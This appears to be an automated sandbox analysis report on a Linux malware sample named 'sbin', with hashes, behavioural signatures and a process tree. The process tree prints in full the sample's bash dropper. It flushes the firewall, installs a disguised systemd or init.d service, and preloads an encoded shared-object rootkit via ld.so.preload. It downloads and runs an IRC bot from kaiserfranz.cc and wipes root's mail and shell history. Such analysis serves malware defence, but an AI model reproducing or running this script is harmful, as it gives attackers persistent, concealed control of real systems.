Resubmissions

29-09-2024 11:53

240929-n2mlkstbpq 10

26-11-2020 12:41

201126-yzw2axgdz2 9

Analysis

  • max time kernel
    593s
  • max time network
    149s
  • platform
    linux_amd64
  • resource
    ubuntu-amd64
  • submitted
    26-11-2020 12:41

General

  • Target

    sbin

  • Size

    6.9MB

  • MD5

    a2a11ec332dfd8b1b273d62f736c48a3

  • SHA1

    cf0c8bd46ff772954f6a98ec30f804e1b851be12

  • SHA256

    e52646f7cb2886d8a5d4c1a2692a5ab80926e7ce48bdb2362f383c0c6c7223a2

  • SHA512

    e749068691711391496b85bae67a5c2f1a786ca2bd0be1d636d6f52337923d49045b0979afad811f47882bbcb3c162e1303dee92995cede5bf76ec739dfbf6b7

Score
9/10

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 70 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • ./sbin
    ./sbin
    1⤵
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:562
  • /proc/self/fd/3
    sbin
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    • Reads CPU attributes
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    PID:566
    • /bin/sh
      sh -c "echo #!/bin/bash

function INIT_MAIN(){
SET_DNS_SERVER
CHECK_SYSTEMD
SET_SO_FILE
SETUP_IRCBOT
CLEANUP_TRACES
}


function SET_DNS_SERVER(){
iptables -F
chattr -ia /etc/ /etc/resolv.conf 2>/dev/null
cat /etc/resolv.conf | grep 'nameserver 8.8.8.8' 2>/dev/null || echo 'nameserver 8.8.8.8' >> /etc/resolv.conf
cat /etc/resolv.conf | grep 'nameserver 8.8.4.4' 2>/dev/null || echo 'nameserver 8.8.4.4' >> /etc/resolv.conf
chattr +i /etc/resolv.conf 2>/dev/null
}


function CHECK_SYSTEMD(){
if type systemctl 2>/dev/null 1>/dev/null; then
SYSTEMD_SERVICE
else
INITD_SERVICE
fi
}


function SYSTEMD_SERVICE(){
if [ ! -f "/lib/systemd/system/NetworkManager-wait.service" ]; then
chattr -ia /lib/ /lib/systemd/ /lib/systemd/system/ 2>/dev/null
mkdir -p /lib/systemd/system/ 2>/dev/null
if ! type nice 2>/dev/null 1>/dev/null; then
export SYSTEMDSRV='W1VuaXRdCkRlc2NyaXB0aW9uPU5ldHdvcmtNYW5hZ2VyLXdhaXQKCltTZXJ2aWNlXQpFeGVjU3RhcnQ9L2Jpbi9zYmluClN0YW5kYXJkT3V0cHV0PW51bGwKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldApBbGlhcz1OZXR3b3JrTWFuYWdlci13YWl0LnNlcnZpY2UK'
else
export SYSTEMDSRV='W1VuaXRdCkRlc2NyaXB0aW9uPU5ldHdvcmtNYW5hZ2VyLXdhaXQKCltTZXJ2aWNlXQpFeGVjU3RhcnQ9bmljZSAtbiAtMjAgL2Jpbi9zYmluClN0YW5kYXJkT3V0cHV0PW51bGwKCltJbnN0YWxsXQpXYW50ZWRCeT1tdWx0aS11c2VyLnRhcmdldApBbGlhcz1OZXR3b3JrTWFuYWdlci13YWl0LnNlcnZpY2UK'
fi
echo $SYSTEMDSRV | base64 -d > /lib/systemd/system/NetworkManager-wait.service
fi
systemctl --system daemon-reload 2>/dev/null
systemctl enable NetworkManager-wait.service 2>/dev/null
systemctl start NetworkManager-wait.service 2>/dev/null
}


function INITD_SERVICE(){
if [ ! -f "/etc/init.d/networks" ]; then
chattr -ia /etc/ /etc/init.d/ 2>/dev/nul
if ! type nice 2>/dev/null 1>/dev/null; then
export INITDSRV='IyMjIEJFR0lOIElOSVQgSU5GTwojIFByb3ZpZGVzOiAgICAgICAgICBOZXR3b3JrTWFuYWdlci13YWl0CiMgUmVxdWlyZWQtU3RhcnQ6ICAgICRuZXR3b3JrCiMgUmVxdWlyZWQtU3RvcDogICAgICRuZXR3b3JrICRsb2NhbF9mcyAkbmFtZWQgJHBvcnRtYXAgJHJlbW90ZV9mcyAkc3lzbG9nICR0aW1lCiMgU2hvdWxkLVN0YXJ0OiAgICAgICRuZXR3b3JrIAkgCiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6ICAgICAgMCAxIDYKIyBTaG9ydC1EZXNjcmlwdGlvbjogTGludXggTmV0d29ya01hbmFnZXItd2FpdAojIERlc2NyaXB0aW9uOiAgICAgICBMaW51eCBOZXR3b3JrTWFuYWdlci13YWl0CiMjIyBFTkQgSU5JVCBJTkZPCgpkaXI9Ii9iaW4iCmNtZD0iL2Jpbi9zYmluIgp1c2VyPSJyb290IgoKbmFtZT1gYmFzZW5hbWUgJDBgCnBpZF9maWxlPSIvYmluLyRuYW1lLnBpZCIKc3Rkb3V0X2xvZz0iL2Jpbi8kbmFtZS5sb2ciCnN0ZGVycl9sb2c9Ii9iaW4vJG5hbWUuZXJyIgoKZ2V0X3BpZCgpIHsKICAgIGNhdCAiJHBpZF9maWxlIgp9Cgppc19ydW5uaW5nKCkgewogICAgWyAtZiAiJHBpZF9maWxlIiBdICYmIHBzIC1wIGBnZXRfcGlkYCA+IC9kZXYvbnVsbCAyPiYxCn0KCmNhc2UgIiQxIiBpbgogICAgc3RhcnQpCiAgICBpZiBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgZWNobyAiQWxyZWFkeSBzdGFydGVkIgogICAgZWxzZQogICAgICAgIGVjaG8gIlN0YXJ0aW5nICRuYW1lIgogICAgICAgIGNkICIkZGlyIgogICAgICAgIGlmIFsgLXogIiR1c2VyIiBdOyB0aGVuCiAgICAgICAgICAgIHN1ZG8gJGNtZCA+PiAiJHN0ZG91dF9sb2ciIDI+PiAiJHN0ZGVycl9sb2ciICYKICAgICAgICBlbHNlCiAgICAgICAgICAgIHN1ZG8gLXUgIiR1c2VyIiAkY21kID4+ICIkc3Rkb3V0X2xvZyIgMj4+ICIkc3RkZXJyX2xvZyIgJgogICAgICAgIGZpCiAgICAgICAgZWNobyAkISA+ICIkcGlkX2ZpbGUiCiAgICAgICAgaWYgISBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgICAgIGVjaG8gIlVuYWJsZSB0byBzdGFydCwgc2VlICRzdGRvdXRfbG9nIGFuZCAkc3RkZXJyX2xvZyIKICAgICAgICAgICAgZXhpdCAxCiAgICAgICAgZmkKICAgIGZpCiAgICA7OwogICAgc3RvcCkKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvIC1uICJTdG9wcGluZyAkbmFtZS4uIgogICAgICAgIGtpbGwgYGdldF9waWRgCiAgICAgICAgZm9yIGkgaW4gMSAyIDMgNCA1IDYgNyA4IDkgMTAKICAgICAgICAjIGZvciBpIGluIGBzZXEgMTBgCiAgICAgICAgZG8KICAgICAgICAgICAgaWYgISBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQoKICAgICAgICAgICAgZWNobyAtbiAiLiIKICAgICAgICAgICAgc2xlZXAgMQogICAgICAgIGRvbmUKICAgICAgICBlY2hvCgogICAgICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICAgICAgZWNobyAiTm90IHN0b3BwZWQ7IG1heSBzdGlsbCBiZSBzaHV0dGluZyBkb3duIG9yIHNodXRkb3duIG1heSBoYXZlIGZhaWxlZCIKICAgICAgICAgICAgZXhpdCAxCiAgICAgICAgZWxzZQogICAgICAgICAgICBlY2hvICJTdG9wcGVkIgogICAgICAgICAgICBpZiBbIC1mICIkcGlkX2ZpbGUiIF07IHRoZW4KICAgICAgICAgICAgICAgIHJtICIkcGlkX2ZpbGUiCiAgICAgICAgICAgIGZpCiAgICAgICAgZmkKICAgIGVsc2UKICAgICAgICBlY2hvICJOb3QgcnVubmluZyIKICAgIGZpCiAgICA7OwogICAgcmVzdGFydCkKICAgICQwIHN0b3AKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvICJVbmFibGUgdG8gc3RvcCwgd2lsbCBub3QgYXR0ZW1wdCB0byBzdGFydCIKICAgICAgICBleGl0IDEKICAgIGZpCiAgICAkMCBzdGFydAogICAgOzsKICAgIHN0YXR1cykKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvICJSdW5uaW5nIgogICAgZWxzZQogICAgICAgIGVjaG8gIlN0b3BwZWQiCiAgICAgICAgZXhpdCAxCiAgICBmaQogICAgOzsKICAgICopCiAgICBlY2hvICJVc2FnZTogJDAge3N0YXJ0fHN0b3B8cmVzdGFydHxzdGF0dXN9IgogICAgZXhpdCAxCiAgICA7Owplc2FjCgpleGl0IDAKCg=='
else
export INITDSRV='IyMjIEJFR0lOIElOSVQgSU5GTwojIFByb3ZpZGVzOiAgICAgICAgICBOZXR3b3JrTWFuYWdlci13YWl0CiMgUmVxdWlyZWQtU3RhcnQ6ICAgICRuZXR3b3JrCiMgUmVxdWlyZWQtU3RvcDogICAgICRuZXR3b3JrICRsb2NhbF9mcyAkbmFtZWQgJHBvcnRtYXAgJHJlbW90ZV9mcyAkc3lzbG9nICR0aW1lCiMgU2hvdWxkLVN0YXJ0OiAgICAgICRuZXR3b3JrIAkgCiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6ICAgICAgMCAxIDYKIyBTaG9ydC1EZXNjcmlwdGlvbjogTGludXggTmV0d29ya01hbmFnZXItd2FpdAojIERlc2NyaXB0aW9uOiAgICAgICBMaW51eCBOZXR3b3JrTWFuYWdlci13YWl0CiMjIyBFTkQgSU5JVCBJTkZPCgpkaXI9Ii9iaW4iCmNtZD0ibmljZSAtbiAtMjAgL2Jpbi9zYmluIgp1c2VyPSJyb290IgoKbmFtZT1gYmFzZW5hbWUgJDBgCnBpZF9maWxlPSIvYmluLyRuYW1lLnBpZCIKc3Rkb3V0X2xvZz0iL2Jpbi8kbmFtZS5sb2ciCnN0ZGVycl9sb2c9Ii9iaW4vJG5hbWUuZXJyIgoKZ2V0X3BpZCgpIHsKICAgIGNhdCAiJHBpZF9maWxlIgp9Cgppc19ydW5uaW5nKCkgewogICAgWyAtZiAiJHBpZF9maWxlIiBdICYmIHBzIC1wIGBnZXRfcGlkYCA+IC9kZXYvbnVsbCAyPiYxCn0KCmNhc2UgIiQxIiBpbgogICAgc3RhcnQpCiAgICBpZiBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgZWNobyAiQWxyZWFkeSBzdGFydGVkIgogICAgZWxzZQogICAgICAgIGVjaG8gIlN0YXJ0aW5nICRuYW1lIgogICAgICAgIGNkICIkZGlyIgogICAgICAgIGlmIFsgLXogIiR1c2VyIiBdOyB0aGVuCiAgICAgICAgICAgIHN1ZG8gJGNtZCA+PiAiJHN0ZG91dF9sb2ciIDI+PiAiJHN0ZGVycl9sb2ciICYKICAgICAgICBlbHNlCiAgICAgICAgICAgIHN1ZG8gLXUgIiR1c2VyIiAkY21kID4+ICIkc3Rkb3V0X2xvZyIgMj4+ICIkc3RkZXJyX2xvZyIgJgogICAgICAgIGZpCiAgICAgICAgZWNobyAkISA+ICIkcGlkX2ZpbGUiCiAgICAgICAgaWYgISBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgICAgIGVjaG8gIlVuYWJsZSB0byBzdGFydCwgc2VlICRzdGRvdXRfbG9nIGFuZCAkc3RkZXJyX2xvZyIKICAgICAgICAgICAgZXhpdCAxCiAgICAgICAgZmkKICAgIGZpCiAgICA7OwogICAgc3RvcCkKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvIC1uICJTdG9wcGluZyAkbmFtZS4uIgogICAgICAgIGtpbGwgYGdldF9waWRgCiAgICAgICAgZm9yIGkgaW4gMSAyIDMgNCA1IDYgNyA4IDkgMTAKICAgICAgICAjIGZvciBpIGluIGBzZXEgMTBgCiAgICAgICAgZG8KICAgICAgICAgICAgaWYgISBpc19ydW5uaW5nOyB0aGVuCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgICAgICBmaQoKICAgICAgICAgICAgZWNobyAtbiAiLiIKICAgICAgICAgICAgc2xlZXAgMQogICAgICAgIGRvbmUKICAgICAgICBlY2hvCgogICAgICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICAgICAgZWNobyAiTm90IHN0b3BwZWQ7IG1heSBzdGlsbCBiZSBzaHV0dGluZyBkb3duIG9yIHNodXRkb3duIG1heSBoYXZlIGZhaWxlZCIKICAgICAgICAgICAgZXhpdCAxCiAgICAgICAgZWxzZQogICAgICAgICAgICBlY2hvICJTdG9wcGVkIgogICAgICAgICAgICBpZiBbIC1mICIkcGlkX2ZpbGUiIF07IHRoZW4KICAgICAgICAgICAgICAgIHJtICIkcGlkX2ZpbGUiCiAgICAgICAgICAgIGZpCiAgICAgICAgZmkKICAgIGVsc2UKICAgICAgICBlY2hvICJOb3QgcnVubmluZyIKICAgIGZpCiAgICA7OwogICAgcmVzdGFydCkKICAgICQwIHN0b3AKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvICJVbmFibGUgdG8gc3RvcCwgd2lsbCBub3QgYXR0ZW1wdCB0byBzdGFydCIKICAgICAgICBleGl0IDEKICAgIGZpCiAgICAkMCBzdGFydAogICAgOzsKICAgIHN0YXR1cykKICAgIGlmIGlzX3J1bm5pbmc7IHRoZW4KICAgICAgICBlY2hvICJSdW5uaW5nIgogICAgZWxzZQogICAgICAgIGVjaG8gIlN0b3BwZWQiCiAgICAgICAgZXhpdCAxCiAgICBmaQogICAgOzsKICAgICopCiAgICBlY2hvICJVc2FnZTogJDAge3N0YXJ0fHN0b3B8cmVzdGFydHxzdGF0dXN9IgogICAgZXhpdCAxCiAgICA7Owplc2FjCgpleGl0IDAKCg=='
fi
echo $INITDSRV | base64 -d > /etc/init.d/networks
fi
chmod +x /etc/init.d/networks 2>/dev/nul
update-rc.d networks defaults 2>/dev/nul ||  chkconfig networks on 2>/dev/nul
service networks install 2>/dev/nul
service networks start 2>/dev/nul
/etc/init.d/networks start 2>/dev/nul
}


function SET_SO_FILE(){
if [ ! -f "/usr/local/lib/systemhealt.so" ]; then
chattr -ia /usr/ /usr/local/ /usr/local/lib/ /etc/ /etc/ld.so.preload 2>/dev/null
SOFILE='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'
chattr -R -ia /tmp/
echo $SOFILE | base64 -d > /tmp/.sh.tar.gz
mkdir -p /usr/local/lib/ 2>/dev/null
tar xvf /tmp/.sh.tar.gz -C /usr/local/lib/ 2>/dev/null
rm -f /tmp/.sh.tar.gz 2>/dev/null
fi
cat /etc/ld.so.preload | grep '/usr/local/lib/systemhealt.so' 2>/dev/null || echo '/usr/local/lib/systemhealt.so' >> /etc/ld.so.preload 2>/dev/null
chattr +i /etc/ld.so.preload 2>/dev/null
}


function SETUP_IRCBOT(){
if [ ! -f "/usr/bin/sbin" ]; then
ZIGGY_GET="http://kaiserfranz.cc/ziggy_spread"
chattr -ia /usr/ /usr/bin/ /usr/bin/sbin 2>/dev/null
wget $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || curl $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wge $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || cur $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wdl $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || cdl $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null || wget2 $ZIGGY_GET -O /usr/bin/sbin 2>/dev/null || curl2 $ZIGGY_GET -o /usr/bin/sbin 2>/dev/null
chmod +x /usr/bin/sbin
fi
/usr/bin/sbin
}


function CLEANUP_TRACES(){
chattr -ia /var/ /var/mail/ /var/mail/root
chmod 1777 /var/mail/root
echo " " > /var/mail/root
chattr +i /var/mail/root
chattr -ia /root/ /root/.bash_history
echo " " > /root/.bash_history
chattr +i /root/.bash_history
history -c 
}


INIT_MAIN

 | base64 -d | bashh 2>/dev/null 1>/dev/null"
      2⤵
        PID:567
        • /usr/bin/base64
          base64 -d
          3⤵
            PID:569

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads